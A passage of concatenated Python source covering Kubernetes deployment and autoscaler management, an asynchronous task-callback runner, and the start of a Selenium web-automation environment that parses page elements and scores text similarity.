self.kube_deployment.service, self.item.metadata.namespace
)
)
else:
raise
else:
self.logging.info(
"deleted deploy/{} from namespace/{}".format(
self.kube_deployment.service, self.item.metadata.namespace
)
)
self.create(kube_client=kube_client)
def update(self, kube_client: KubeClient) -> None:
# If HPA is enabled, do not update replicas.
# In all other cases, replica is set to max(instances, min_instances)
if self.soa_config.config_dict.get("bounce_method", "") == "brutal":
threading.Thread(
target=self.deep_delete_and_create, args=[KubeClient()]
).start()
return
update_deployment(kube_client=kube_client, formatted_deployment=self.item)
def update_related_api_objects(self, kube_client: KubeClient) -> None:
super().update_related_api_objects(kube_client)
self.sync_horizontal_pod_autoscaler(kube_client)
def sync_horizontal_pod_autoscaler(self, kube_client: KubeClient) -> None:
"""
In order for autoscaling to work, there needs to be at least two configurations
min_instnace, max_instance, and there cannot be instance.
"""
desired_hpa_spec = self.soa_config.get_autoscaling_metric_spec(
name=self.item.metadata.name,
cluster=self.soa_config.cluster,
kube_client=kube_client,
namespace=self.item.metadata.namespace,
)
hpa_exists = self.exists_hpa(kube_client)
should_have_hpa = desired_hpa_spec and not autoscaling_is_paused()
if not should_have_hpa:
self.logging.info(
f"No HPA required for {self.item.metadata.name}/name in {self.item.metadata.namespace}"
)
if hpa_exists:
self.logging.info(
f"Deleting HPA for {self.item.metadata.name}/name in {self.item.metadata.namespace}"
)
self.delete_horizontal_pod_autoscaler(kube_client)
return
self.logging.info(
f"Syncing HPA setting for {self.item.metadata.name}/name in {self.item.metadata.namespace}"
)
self.logging.debug(desired_hpa_spec)
if not hpa_exists:
self.logging.info(
f"Creating new HPA for {self.item.metadata.name}/name in {self.item.metadata.namespace}"
)
kube_client.autoscaling.create_namespaced_horizontal_pod_autoscaler(
namespace=self.item.metadata.namespace,
body=desired_hpa_spec,
pretty=True,
)
else:
self.logging.info(
f"Updating new HPA for {self.item.metadata.name}/name in {self.item.metadata.namespace}/namespace"
)
kube_client.autoscaling.replace_namespaced_horizontal_pod_autoscaler(
name=self.item.metadata.name,
namespace=self.item.metadata.namespace,
body=desired_hpa_spec,
pretty=True,
)
def exists_hpa(self, kube_client: KubeClient) -> bool:
return (
len(
kube_client.autoscaling.list_namespaced_horizontal_pod_autoscaler(
field_selector=f"metadata.name={self.item.metadata.name}",
namespace=self.item.metadata.namespace,
).items
)
> 0
)
def delete_horizontal_pod_autoscaler(self, kube_client: KubeClient) -> None:
try:
kube_client.autoscaling.delete_namespaced_horizontal_pod_autoscaler(
name=self.item.metadata.name,
namespace=self.item.metadata.namespace,
body=V1DeleteOptions(),
)
except ApiException as e:
if e.status == 404:
# Deployment does not exist, nothing to delete but
# we can consider this a success.
self.logging.debug(
f"not deleting nonexistent HPA/{self.item.metadata.name} from namespace/{self.item.metadata.namespace}"
)
else:
raise
else:
self.logging.info(
"deleted HPA/{} from namespace/{}".format(
self.item.metadata.name, self.item.metadata.namespace
)
)
class StatefulSetWrapper(Application):
def deep_delete(self, kube_client: KubeClient) -> None:
"""
Remove all controllers, pods, and pod disruption budgets related to this application
:param kube_client:
"""
delete_options = V1DeleteOptions(propagation_policy="Foreground")
try:
kube_client.deployments.delete_namespaced_stateful_set(
self.item.metadata.name,
self.item.metadata.namespace,
body=delete_options,
)
except ApiException as e:
if e.status == 404:
# StatefulSet does not exist, nothing to delete but
# we can consider this a success.
self.logging.debug(
"not deleting nonexistent statefulset/{} from namespace/{}".format(
self.item.metadata.name, self.item.metadata.namespace
)
)
else:
raise
else:
self.logging.info(
"deleted statefulset/{} from namespace/{}".format(
self.item.metadata.name, self.item.metadata.namespace
)
)
self.delete_pod_disruption_budget(kube_client)
def create(self, kube_client: KubeClient):
create_stateful_set(kube_client=kube_client, formatted_stateful_set=self.item)
self.ensure_pod_disruption_budget(kube_client)
def update(self, kube_client: KubeClient):
update_stateful_set(kube_client=kube_client, formatted_stateful_set=self.item)
def get_application_wrapper(
formatted_application: Union[V1Deployment, V1StatefulSet]
) -> Application:
app: Application
if isinstance(formatted_application, V1Deployment):
app = DeploymentWrapper(formatted_application)
elif isinstance(formatted_application, V1StatefulSet):
app = StatefulSetWrapper(formatted_application)
else:
raise Exception("Unknown kubernetes object to update")
return app
|
async_runner.py
|
import logging
import os
import traceback
from collections import namedtuple
from queue import Empty
from threading import Thread
from task_processing.interfaces.runner import Runner
EventHandler = namedtuple('EventHandler', ['predicate', 'cb'])
log = logging.getLogger(__name__)
class AsyncError(Exception):
pass
class Async(Runner):
# TODO: "callbacks" is inconsistent with the EventHandler terminology
# above. This should either be event_handlers, or
# EventHandler should be Callback
def __init__(self, executor, callbacks=None):
if not callbacks:
raise AsyncError("must provide at least one callback")
self.callbacks = callbacks
self.executor = executor
self.TASK_CONFIG_INTERFACE = executor.TASK_CONFIG_INTERFACE
self.stopping = False
self.callback_t = Thread(target=self.callback_loop)
self.callback_t.daemon = True
self.callback_t.start()
def run(self, task_config):
return self.executor.run(task_config)
def kill(self, task_id):
return self.executor.kill(task_id)
def reconcile(self, task_config):
self.executor.reconcile(task_config)
def callback_loop(self):
event_queue = self.executor.get_event_queue()
while True:
if self.stopping:
return
try:
event = event_queue.get(True, 10)
# TODO: have a default callback? raise exception when this
# event is ignored?
if event.kind == 'control' and \
event.message == 'stop':
self.stopping = True
continue
for cb in self.callbacks:
if cb.predicate(event):
try:
cb.cb(event)
except Exception:
log.error(traceback.format_exc())
os._exit(1)
except Empty:
pass
def stop(self):
self.executor.stop()
self.stopping = True
self.callback_t.join()
|
environment.py
|
# -*- coding: utf-8 -*-
import argparse
import hashlib
import json
import logging
import os
import sys
import platform
import random
import re
import time
import copy
import shutil
import traceback
import difflib
import networkx as nx
import numpy as np
import spacy
import functools
from itertools import takewhile
from io import BytesIO
from zipfile import ZipFile, ZIP_DEFLATED
from datetime import datetime
from dateutil import parser as date_parser
from PIL import Image, ImageTk
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
from selenium.common.exceptions import TimeoutException
from selenium.webdriver.remote.webelement import WebElement
from selenium.webdriver.support.select import Select
from selenium.common.exceptions import NoSuchElementException
GLOBAL_CONFIGS = {
"semantic_similarity": False,
"action_restriction": False,
"use_annotations": True,
}
REWARD_ITEM_WEIGHTS = {
"step_count": -1,
"action_spatial_distance": -2,
"action_direction": -2,
# "similarity_with_demo_actions": 0,
# "similarity_with_demo_surrounding": 0,
"similarity_with_non_parameters": 5,
"similarity_with_parameters": 10,
# "distance_between_parameters": 0,
"null": 0
}
EXCLUDE_QUERY_WORDS = ["of", "a", "an", "the", "in", "on", "by", "with", "and",
"for", "at", "that", "from", "to", "me", "about"]
SPACY_EXCLUDE = ["first", "second", "third"]
DISTANCE_THRESHOLD = 500
UTG_AS_ZIP = True
COMPRESS_METHOD = ZIP_DEFLATED
COMPRESS_LEVEL = 3
# Hosts that need a longer wait time
LONG_WAIT_HOSTS = [
"academic.microsoft.com",
"ieeexplore.ieee.org",
"online.unitconverterpro.com",
"searchit.libraries.wsu.edu",
"www.rentcafe.com",
"www.rent.com",
"www.joybuy.com",
"www.kohls.com",
"www.bing.com",
"www.google.com",
"estimatefares.com",
"ride.guru",
"www.lyft.com"
]
RESTART_HOSTS = [
"www.expedia.com",
"www.bing.com",
"www.regmovies.com",
"www.fandango.com",
"www.atomtickets.com",
"www.movietickets.com",
"www.moviefone.com",
"www.opentable.com",
"www.uber.com",
"catalog.swanlibraries.net",
"dictionary.cambridge.org",
"www.merriam-webster.com"
]
def lazy_property(func):
attribute = '_lazy_' + func.__name__
@property
@functools.wraps(func)
def wrapper(self):
if not hasattr(self, attribute):
setattr(self, attribute, func(self))
return getattr(self, attribute)
return wrapper
class Utils:
_instance = None
def __init__(self):
self.cache = {}
@staticmethod
def _get_instance():
if Utils._instance is None:
Utils._instance = Utils()
return Utils._instance
@lazy_property
def _nlp(self):
nlp = spacy.load("en_core_web_md")
return nlp
@staticmethod
def parse(sentence):
if not sentence:
return sentence
# convert one-way to oneway, g-pound to gpound
sentence = sentence.replace("-", "")
tokens = [token.lemma_ for token in Utils.nlp(sentence.lower(), disable=["tokenizer", "parser", "ner"])]
filtered_tokens = []
for token in tokens:
if len(token) > 1 or Utils.is_number(token):
filtered_tokens.append(token)
return " ".join(filtered_tokens if len(filtered_tokens) > 0 else tokens)
@staticmethod
def md5(text):
m = hashlib.md5(text.encode("utf-8"))
return m.hexdigest()
@staticmethod
def common_prefix(words):
return ''.join(c[0] for c in takewhile(lambda x: all(x[0] == y for y in x), zip(*words)))
@staticmethod
def parse_time_info(text):
time_info = []
try:
date = date_parser.parse(text)
today = datetime.today()
if date.year != today.year:
time_info.append("year:" + str(date.year))
if date.month != today.month:
time_info.append("month:" + str(date.month))
if date.day != today.day:
time_info.append("day:" + str(date.day))
if date.hour != today.hour and date.hour != 0:
time_info.append("hour:" + str(date.hour))
if date.minute != today.minute and date.minute != 0:
time_info.append("minute:" + str(date.minute))
if date.second != today.second and date.second != 0:
time_info.append("second:" + str(date.second))
except Exception:
pass
return time_info
@staticmethod
def date_similarity(query_text, match_text):
method_id = "date_similarity(%s,%s)" % (query_text, match_text)
if method_id not in Utils._get_instance().cache:
query_time_info = Utils.parse_time_info(query_text)
if len(query_time_info) == 0:
return 0
match_time_info = Utils.parse_time_info(match_text)
if len(match_time_info) == 0:
return 0
query_time_info_set = set(query_time_info)
match_time_info_set = set(match_time_info)
if (not query_time_info_set.issuperset(match_time_info_set)) \
and (not query_time_info_set.issubset(match_time_info_set)):
return 0
similarity = difflib.SequenceMatcher(None, query_time_info, match_time_info).ratio()
Utils._get_instance().cache[method_id] = similarity
return similarity
return Utils._get_instance().cache[method_id]
@staticmethod
def words_similarity(query_words, match_words):
query_words = set(query_words)
match_words = set(match_words)
if len(query_words) == 0 or len(match_words) == 0:
return 0
common_score = 0.0
for query_word in query_words:
similarities = [Utils.word_similarity(query_word, match_word) for match_word in match_words]
common_score += max(similarities)
return common_score * 2.0 / (len(query_words) + len(match_words))
@staticmethod
def word_similarity(query_word, match_word, enable_semantic_sim=None):
if enable_semantic_sim is None:
enable_semantic_sim = GLOBAL_CONFIGS['semantic_similarity']
if query_word == match_word:
return 1
query_word = re.sub("[^0-9A-Za-z]", " ", query_word).strip()
match_word = re.sub("[^0-9A-Za-z]", " ", match_word).strip()
if query_word == match_word:
return 1
if len(query_word) == 0 or len(match_word) == 0:
return 0
# # Dirty workaround to fix synonym matching
synonym_lists = [
["weight", "mass"],
["synonym", "thesaurus"],
["find", "search"],
["bedroom", "bed"],
["walk", "foot"],
["publication", "pub"],
["number", "num"],
["destination", "dropoff", "end", "target"],
["source", "start", "pickup"],
["calculate", "compute", "estimate"],
["location", "where", "address"],
["route", "direction"]
]
for synonym_list in synonym_lists:
if query_word in synonym_list and match_word in synonym_list:
return 1
# common_prefix = Utils.common_prefix([query_word, match_word])
# similarity = len(common_prefix) / max(len(query_word), len(match_word))
if Utils.is_number(query_word) and query_word in match_word.split():
return 0.8
if Utils.is_number(match_word) and match_word in query_word.split():
return 0.8
similarity = difflib.SequenceMatcher(None, query_word, match_word).ratio()
if query_word[0] != match_word[0]:
similarity = similarity * 0.5
if enable_semantic_sim:
semantic_similarity = Utils._semantic_similarity(query_word, match_word)
similarity = max(similarity, semantic_similarity)
similarity = similarity if similarity > 0.7 else 0
return similarity
@staticmethod
def _semantic_similarity(query_text, match_text):
semantic_similarity = 0
query_processed = Utils.nlp(query_text)
match_processed = Utils.nlp(match_text)
if query_processed.vector_norm and match_processed.vector_norm:
semantic_similarity = query_processed.similarity(match_processed)
if semantic_similarity < 0:
semantic_similarity = 0
semantic_similarity **= 0.5
return semantic_similarity
@staticmethod
def number_similarity(query_text, match_text):
if Utils.is_number(query_text) and Utils.is_number(match_text):
if abs(float(query_text.replace(",", "")) - float(match_text.replace(",", ""))) < 0.001:
return 1
return 0
@staticmethod
def text_similarity(query_text, match_text):
method_id = "text_similarity(%s,%s)" % (query_text, match_text)
if method_id not in Utils._get_instance().cache:
# try more advanced string similarity metric
if len(query_text) == 0 or len(match_text) == 0:
similarity = 0
elif query_text == match_text:
similarity = 1
elif Utils.is_number(query_text) and Utils.is_number(match_text):
similarity = Utils.number_similarity(query_text, match_text)
elif Utils.is_date(query_text) or Utils.is_date(match_text):
similarity = Utils.date_similarity(query_text, match_text)
else:
if len(query_text) > 3 and len(match_text) > 3:
similarity = Utils.words_similarity(query_text.split(), match_text.split()) ** 0.5
else:
similarity = Utils.word_similarity(query_text, match_text)
# date_similarity = Utils.date_similarity(query_text, match_text)
# similarity = max(similarity, date_similarity)
similarity = similarity if similarity > 0.5 else 0
Utils._get_instance().cache[method_id] = similarity
return similarity
return Utils._get_instance().cache[method_id]
@staticmethod
def weighted_choice(sample_values, reverse=False):
"""
Choose a sample based on the values.
Samples with higher/lower values get higher chance to be selected.
:param sample_values: a dict mapping samples to values, values should be positive
:param reverse: If set to True, samples with lower values get higher chance to be selected.
:return: a sample
"""
if not sample_values:
return None
samples, values = list(zip(*sample_values.items()))
try:
weights = (1 / (np.array(values) + 0.01)) if reverse else np.array(values)
weight_sum = np.sum(weights)
return np.random.choice(samples) if weight_sum == 0 else np.random.choice(samples, p=weights / weight_sum)
except Exception:
pass
return np.random.choice(samples)
@staticmethod
def create_fake_state(current_state, action):
if (not isinstance(current_state, State)) or (not isinstance(action, Action)):
return None
fake_state_dict = copy.deepcopy(current_state.state_dict)
fake_state_screen = current_state.screenshot
fake_state = State(state_dict=fake_state_dict, screenshot=fake_state_screen)
target_ele = fake_state.get_element_by_locator(action.element.locator)
if target_ele is None or not isinstance(target_ele, Element):
return None
if action.action_type not in target_ele.acceptable_action_types:
return None
if action.action_type == Action.INPUT_TEXT:
if target_ele.accepts_text(action.value):
target_ele.ele_dict["value"] = action.value
return fake_state
elif action.action_type == Action.SELECT:
idx_to_select = int(action.value)
try:
options = target_ele.ele_dict["actionSet"]["options"]
option_to_select = options[idx_to_select]
target_ele.ele_dict["actionSet"]["selectedIndices"] = [idx_to_select]
target_ele.ele_dict["text"] = option_to_select
return fake_state
except:
return None
elif action.is_submit:
return fake_state
return None
@staticmethod
def parse_action_to_triple(action_line):
if len(action_line) == 3:
# already a triple
return action_line
m = re.match(ACTION_RE, action_line)
if m:
return m.group(1), m.group(2), m.group(3)
return None
@staticmethod
def parse_actions_to_triples(action_lines):
triples = []
if action_lines is None:
return triples
for action_line in action_lines:
triple = Utils.parse_action_to_triple(action_line)
triples.append(triple)
return triples
@staticmethod
def force_to_str(text):
try:
return str(text)
except:
pass
try:
return str(text.decode("utf-8"))
except:
return text
@staticmethod
def get_host(url):
host_start = url.find("://") + 3
if host_start < 3:
host_start = 0
host_end = url.find("/", host_start)
if host_end == -1:
return url[host_start:]
else:
return url[host_start:host_end]
@staticmethod
def parse_rgb(rgb_str):
m = re.search("(\d+),\s*(\d+),\s*(\d+)", rgb_str)
if m:
return m.group(1), m.group(2), m.group(3)
else:
return None
@staticmethod
def top_n(sample_values, n, reverse=False):
"""
get top N samples
"""
if not sample_values or n == 0:
return []
first_value = list(sample_values.values())[0]
sort_key = lambda x: x[1]
if isinstance(first_value, tuple) or isinstance(first_value, list):
sort_key = lambda x: x[1][0]
sample_value_pairs = sorted(sample_values.items(), key=sort_key, reverse=reverse)
result = []
for sample, value in sample_value_pairs:
if len(result) >= n:
return result
result.append(sample)
return result
@staticmethod
def is_number(text):
try:
num = float(text.replace(",", ""))
except:
return False
return True
@staticmethod
def is_date(text):
if text is None or Utils.is_number(text):
return False
for c in ["-", "/"]:
if c not in text:
continue
if text.startswith(c) or text.endswith(c):
continue
s = text.replace(c, "")
if len(s) > 8:
continue
if Utils.is_number(s):
return True
ss = s.lower().replace("y", "").replace("m", "").replace("d", "")
if len(ss) == 0:
return True
if len(Utils.parse_time_info(text)) > 0:
return True
return False
@staticmethod
def get_text_type(text):
if Utils.is_number(text):
return "number"
if Utils.is_date(text):
return "date"
return "text"
@staticmethod
def get_distance(x1, y1, x2, y2):
return ((x1 - x2) ** 2 + (y1 - y2) ** 2) ** 0.5
@staticmethod
def nlp(text, **kwargs):
return Utils._get_instance()._nlp(text, **kwargs)
@staticmethod
def vec(text):
text_processed = Utils.nlp(text.lower(), disable=["tokenizer", "parser", "ner"])
return text_processed.vector
@staticmethod
def split_identifier(text):
matches = re.finditer('.+?(?:(?<=[a-z])(?=[A-Z])|(?<=[A-Z])(?=[A-Z][a-z])|$)', text)
words = []
for m in matches:
words.extend(re.split('[-_]', m.group(0)))
return words
class Element:
def __init__(self, ele_dict, state):
self.ele_dict = ele_dict
self.state = state
self.id = ele_dict["WebBotID"]
self.tag_name = ele_dict["tagName"]
self.xpath = ele_dict["xpath"]
self.xpath_short = ele_dict["xpathShort"]
self.locator = ele_dict["locator"]
@lazy_property
def type(self):
if "type" in self.ele_dict:
return self.ele_dict["type"]
else:
return ""
@lazy_property
def in_window(self):
bound = self.ele_dict["bound"]
return bound["top"] < self.state.window_height and \
bound["bottom"] > 0 and \
bound["left"] < self.state.window_width and \
bound["right"] > 0
@lazy_property
def center(self):
bound = self.ele_dict["bound"]
center_x = (bound["left"] + bound["right"]) / 2
center_y = (bound["top"] + bound["bottom"]) / 2
return center_x, center_y
@lazy_property
def position(self):
bound = self.ele_dict["bound"]
return bound["left"], bound["top"]
@lazy_property
def bound_ltrb(self):
"""
return element bound coordinates, left, top, right, bottom
:return:
"""
bound = self.ele_dict["bound"]
return bound["left"], bound["top"], bound["right"], bound["bottom"]
@lazy_property
def font_size(self):
if "style" in self.ele_dict and "fontSize" in self.ele_dict["style"]:
return float(self.ele_dict["style"]["fontSize"])
return 0
@lazy_property
def font_weight(self):
if "style" in self.ele_dict and "fontWeight" in self.ele_dict["style"]:
return float(self.ele_dict["style"]["fontWeight"])
return 0
@lazy_property
def has_background_image(self):
if "style" in self.ele_dict and "hasBgImg" in self.ele_dict["style"]:
return self.ele_dict["style"]["hasBgImg"]
return False
@lazy_property
def has_border(self):
if "style" in self.ele_dict and "hasBorder" in self.ele_dict["style"]:
return self.ele_dict["style"]["hasBorder"]
return False
@lazy_property
def text_color_rgb(self):
if "style" in self.ele_dict and "color" in self.ele_dict["style"]:
return Utils.parse_rgb(self.ele_dict["style"]["color"])
return None
@lazy_property
def background_color_rgb(self):
if "style" in self.ele_dict and "bgColor" in self.ele_dict["style"]:
return Utils.parse_rgb(self.ele_dict["style"]["bgColor"])
return None
@lazy_property
def is_clickable(self):
if Action.CLICK in self.acceptable_action_types:
return True
if self.parent is None:
return False
return self.parent.is_clickable
@lazy_property
def dom_id(self):
self_id = self.ele_dict["domId"] if "domId" in self.ele_dict else None
if self_id:
return self_id
if self.parent is None:
return ""
return self.parent.dom_id
@lazy_property
def acceptable_action_types(self):
acceptable_action_types = []
action_set = self.ele_dict["actionSet"]
if action_set:
action_type = action_set["actionType"]
if action_type in ["click"]:
acceptable_action_types.append(Action.CLICK)
elif action_type in ["check"]:
acceptable_action_types.append(Action.CHECK)
elif action_type in ["select"]:
acceptable_action_types.append(Action.SELECT)
elif action_type in ["setValue"]:
acceptable_action_types.append(Action.INPUT_TEXT)
acceptable_action_types.append(Action.PRESS_ENTER)
return acceptable_action_types
@lazy_property
def get_webbot_xpath(self):
return "//*[@webbotid='%s']" % self.id
def get_acceptable_actions(self, task=None):
# Generate possible actions
acceptable_actions = []
action_set = self.ele_dict["actionSet"]
if action_set:
action_type = action_set["actionType"]
ele_type = self.ele_dict["type"] if "type" in self.ele_dict else None
if action_type == "click":
href = action_set["href"] if "href" in action_set else None
href_excluded = href and href.startswith("mailto:")
if ele_type != "reset" and not href_excluded:
action = Action(self, Action.CLICK, "")
acceptable_actions.append(action)
elif action_type == "setValue":
current_value = self.ele_dict["value"] if "value" in self.ele_dict else None
if task is not None:
if current_value in task.query_words:
action = Action(self, Action.PRESS_ENTER, "")
acceptable_actions.append(action)
for i, word in enumerate(task.query_words):
annotation = task.query_annotations[i]
if annotation:
action = Action(self, Action.INPUT_TEXT, word)
acceptable_actions.append(action)
# placeholder = self.ele_dict["placeholder"] if "placeholder" in self.ele_dict else None
# if placeholder or current_value:
# click_action = Action(self, Action.CLICK, "")
# acceptable_actions.append(click_action)
elif action_type == "check":
checked = action_set["checked"] if "checked" in action_set else False
if not checked:
action = Action(self, Action.CHECK, "")
acceptable_actions.append(action)
elif action_type == "select":
selected_indices = action_set["selectedIndices"] if "selectedIndices" in action_set else []
options = action_set["options"] if "options" in action_set else []
for i in range(len(options)):
# if i in selected_indices:
# continue
action = Action(self, Action.SELECT, i)
acceptable_actions.append(action)
else:
raise RuntimeError("Failed to recognize: " + action_type)
return acceptable_actions
def accepts_text(self, text):
if not text:
return False
if not Action.INPUT_TEXT in self.acceptable_action_types:
return False
ele_type = self.ele_dict["type"] if "type" in self.ele_dict else ""
if ele_type in ["", "text", "search", "password"]:
ele_value = self.ele_dict["value"] if "value" in self.ele_dict else ""
ele_placeholder = self.ele_dict["placeholder"] if "placeholder" in self.ele_dict else ""
if Utils.is_number(ele_value) or Utils.is_number(ele_placeholder):
return Utils.is_number(text)
return True
elif ele_type in ["button", "checkbox", "file", "hidden", "image", "radio", "reset", "submit", "range"]:
return False
elif ele_type in ["number", "range"]:
return Utils.is_number(text)
elif ele_type == "date":
if not re.match(r"\d{4}-\d{2}-\d{2}", text):
return False
elif ele_type == "month":
if not re.match(r"\d{4}-\d{2}", text):
return False
elif ele_type == "time":
if not re.match(r"\d{4}:\d{2}", text):
return False
elif ele_type == "week":
if not re.match(r"\d{4}-W\d{2}", text):
return False
elif ele_type == "datetime-local":
if not re.match(r"\d{4}-\d{2}-\d{2}T\d{2}:\d{2}", text):
return False
elif ele_type == "email":
if not re.match(r"[^@]+@.+", text):
return False
return True
@lazy_property
def parent(self):
return self.state.get_parent(self)
@lazy_property
def parent_form(self):
if self.parent is None or self.parent.tag_name == "FORM":
return self.parent
return self.parent.parent_form
@lazy_property
def form_submit_action(self):
if self.tag_name != "FORM":
return None
for ele in self.all_child_elements:
if ele.type == "submit":
return Action(ele, Action.CLICK, "")
return None
@lazy_property
def all_child_elements(self):
all_child_elements = []
for ele in self.child_elements:
all_child_elements.append(ele)
all_child_elements.extend(ele.all_child_elements)
return all_child_elements
@lazy_property
def child_elements(self):
return self.state.get_child_elements(self)
@lazy_property
def own_text_list(self):
text_list = []
if "text" in self.ele_dict and self.ele_dict["text"]:
text_list.append(Utils.force_to_str(self.ele_dict["text"]).strip())
if "value" in self.ele_dict and self.ele_dict["value"]:
text_list.append(Utils.force_to_str(self.ele_dict["value"]).strip())
if "placeholder" in self.ele_dict and self.ele_dict["placeholder"]:
text_list.append(Utils.force_to_str(self.ele_dict["placeholder"]).strip())
if "title" in self.ele_dict and self.ele_dict["title"]:
text_list.append(Utils.force_to_str(self.ele_dict["title"]).strip())
if "labelValue" in self.ele_dict and self.ele_dict["labelValue"]:
text_list.append(Utils.force_to_str(self.ele_dict["labelValue"]).strip())
if "labelText" in self.ele_dict and self.ele_dict["labelText"]:
text_list.append(Utils.force_to_str(self.ele_dict["labelText"]).strip())
if "ariaLabel" in self.ele_dict and self.ele_dict["ariaLabel"]:
text_list.append(Utils.force_to_str(self.ele_dict["ariaLabel"]).strip())
# text_list.extend(Utils.split_identifier(self.dom_id))
return text_list
@lazy_property
def own_text_list_parsed(self):
text_list = []
for text in self.own_text_list:
text_list.append(Utils.parse(text))
return text_list
@lazy_property
def own_text(self):
return self.own_text_list[0] if len(self.own_text_list) > 0 else ""
@lazy_property
def own_text_parsed(self):
return self.own_text_list_parsed[0] if len(self.own_text_list_parsed) > 0 else ""
@lazy_property
def own_noninput_text(self):
input_text = ""
if Action.INPUT_TEXT in self.acceptable_action_types:
if "value" in self.ele_dict and self.ele_dict["value"]:
input_text = self.ele_dict["value"]
own_text_list = copy.copy(self.own_text_list)
if input_text in own_text_list:
own_text_list.remove(input_text)
return own_text_list[0] if len(own_text_list) > 0 else ""
@lazy_property
def own_noninput_text_parsed(self):
return Utils.parse(self.own_noninput_text)
@lazy_property
def inner_text_list(self):
text_list = list(self.own_text_list)
if self.tag_name != "SELECT":
# Ignore text in options, as the text of selected options is already in current element
for child_ele in self.child_elements:
text_list.extend(child_ele.inner_text_list)
return text_list
@lazy_property
def inner_text_list_parsed(self):
text_list = list(self.own_text_list_parsed)
if self.tag_name != "SELECT":
for child_ele in self.child_elements:
text_list.extend(child_ele.inner_text_list_parsed)
return text_list
@lazy_property
def inner_text(self):
words = [self.own_text]
if self.tag_name != "SELECT":
for child_ele in self.child_elements:
child_inner_text = child_ele.inner_text
if child_inner_text:
words.append(child_inner_text)
return " ".join(words)
@lazy_property
def inner_text_parsed(self):
words = [self.own_text_parsed]
if self.tag_name != "SELECT":
for child_ele in self.child_elements:
child_inner_text_words = child_ele.inner_text_parsed
if child_inner_text_words:
words.append(child_inner_text_words)
return " ".join(words)
def get_neighbour_element(self):
neighbour_element = None
shortest_dist = 100
for ele in self.state.unactionable_elements:
dist = self.get_shortest_distance(ele)
if dist < shortest_dist:
shortest_dist = dist
neighbour_element = ele
return neighbour_element
def max_match_score(self, text, is_input=False):
"""
compute the maximum matching score between current element and a given text
"""
scores = [0.0]
if is_input and Action.INPUT_TEXT in self.acceptable_action_types:
own_text_original = self.own_text.lower()
if self.own_text_parsed.startswith(text) or f"({text})" in own_text_original:
scores.append(1.0)
word_list = self.inner_text_list_parsed if len(self.inner_text_list_parsed) < 4 else self.own_text_list_parsed
if len(word_list) < 4:
for word_parsed in word_list:
score = Utils.text_similarity(text, word_parsed)
scores.append(score)
max_score = max(scores)
return max_score
def get_resized_bound(self, new_width, new_height):
window_w, window_h = self.state.window_width, self.state.window_height
resize_w, resize_h = float(new_width) / window_w, float(new_height) / window_h
bound = self.ele_dict["bound"]
return {
"top": int(max(0, bound["top"]) * resize_h),
"bottom": int(min(window_h, bound["bottom"]) * resize_h),
"left": int(max(0, bound["left"]) * resize_w),
"right": int(min(window_w, bound["right"]) * resize_w)
}
@lazy_property
def center(self):
bound = self.ele_dict["bound"]
center_x = float(bound["left"] + bound["right"]) / 2
center_y = float(bound["top"] + bound["bottom"]) / 2
return center_x, center_y
@lazy_property
def path_to_root(self):
path = [self]
parent_id = self.ele_dict["parent"]
if parent_id != -1:
parent_ele = self.state.id2elements[parent_id]
path.extend(parent_ele.path_to_root)
return path
@lazy_property
def cluster_id(self):
return re.sub(r"\d+", "?", self.xpath) + self.style_str
def get_tree_distance(self, ele):
path1 = self.path_to_root
path2 = ele.path_to_root
common_suffix_len = 0
for i in range(min(len(path1), len(path2))):
if path1[-i - 1].__str__() != path2[-i - 1].__str__():
break
common_suffix_len += 1
dist = len(path1) + len(path2) - 2 * common_suffix_len
return dist + 1
def get_center_distance(self, ele):
c1 = self.center
c2 = ele.center
dist = Utils.get_distance(c1[0], c1[1], c2[0], c2[1])
return dist
def get_shortest_distance(self, ele):
l1, t1, r1, b1 = self.bound_ltrb
l2, t2, r2, b2 = ele.bound_ltrb
left = r2 < l1
right = r1 < l2
bottom = b2 < t1
top = b1 < t2
if top and left:
return Utils.get_distance(l1, b1, r2, t2) * 2
elif left and bottom:
return Utils.get_distance(l1, t1, r2, b2) * 2
elif bottom and right:
return Utils.get_distance(r1, t1, l2, b2) * 2
elif right and top:
return Utils.get_distance(r1, b1, l2, t2) * 2
elif left:
return l1 - r2
elif right:
return l2 - r1
elif bottom:
return t1 - b2
elif top:
return t2 - b1
else: # rectangles intersect
return self.get_center_distance(ele)
@staticmethod
def cluster_elements(elements):
cluster_id_to_elements = {}
for ele in elements:
if ele.cluster_id not in cluster_id_to_elements:
cluster_id_to_elements[ele.cluster_id] = []
cluster_id_to_elements[ele.cluster_id].append(ele)
return cluster_id_to_elements
@lazy_property
def style_str(self):
return "FONT:size=%d;weight=%d;color=%s; BACKGROUND:img=%s;border=%s;color=%s;" % (
self.font_size,
self.font_weight,
",".join(self.text_color_rgb) if self.text_color_rgb else "null",
"Y" if self.has_background_image else "N",
"Y" if self.has_border else "N",
",".join(self.background_color_rgb) if self.background_color_rgb else "null",
)
def __str__(self):
return "[%s text=\"%s\"]" % (self.tag_name, self.inner_text)
class State:
def __init__(self, state_dict, screenshot=None):
self.state_dict = state_dict
self.screenshot = screenshot
self.url = state_dict["url"]
self.host = state_dict["host"]
self.window_width = state_dict["windowWidth"]
self.window_height = state_dict["windowHeight"]
self.possible_actions = []
self.task = None
self.finish_action = None
self.loaded_state_str = None
def __str__(self):
return self.url
def snapshot(self):
state_dict_copy = copy.deepcopy(self.state_dict)
return State(state_dict=state_dict_copy, screenshot=self.screenshot)
@lazy_property
def elements(self):
return [Element(state=self, ele_dict=ele_dict) for ele_dict in self.state_dict["elements"]]
@lazy_property
def elements_in_window(self):
elements_in_window = []
for ele in self.elements:
if ele.in_window:
elements_in_window.append(ele)
return elements_in_window
@lazy_property
def unclickable_elements(self):
elements = []
for ele in self.elements_in_window:
if not ele.is_clickable and len(ele.own_text) > 0:
elements.append(ele)
return elements
@lazy_property
def clickable_elements(self):
elements = []
for ele in self.elements_in_window:
if ele.is_clickable:
elements.append(ele)
return elements
@lazy_property
def unactionable_elements(self):
elements = []
for ele in self.elements_in_window:
if ele.acceptable_action_types:
continue
if not len(ele.own_text):
continue
if ele.is_clickable:
continue
elements.append(ele)
return elements
@lazy_property
def actionable_elements(self):
elements = []
for ele in self.elements_in_window:
if ele.acceptable_action_types:
elements.append(ele)
elif ele.tag_name == "OPTION":
elements.append(ele)
return elements
@lazy_property
def actionable_text_set(self):
text_set = set()
for ele in self.actionable_elements:
text = ele.own_text_parsed
# if Action.INPUT_TEXT in ele.acceptable_action_types:
# text = ele.own_noninput_text_parsed
if len(text) == 0 or len(text) > 30:
continue
text_set.add(text)
return text_set
@lazy_property
def content_elements(self):
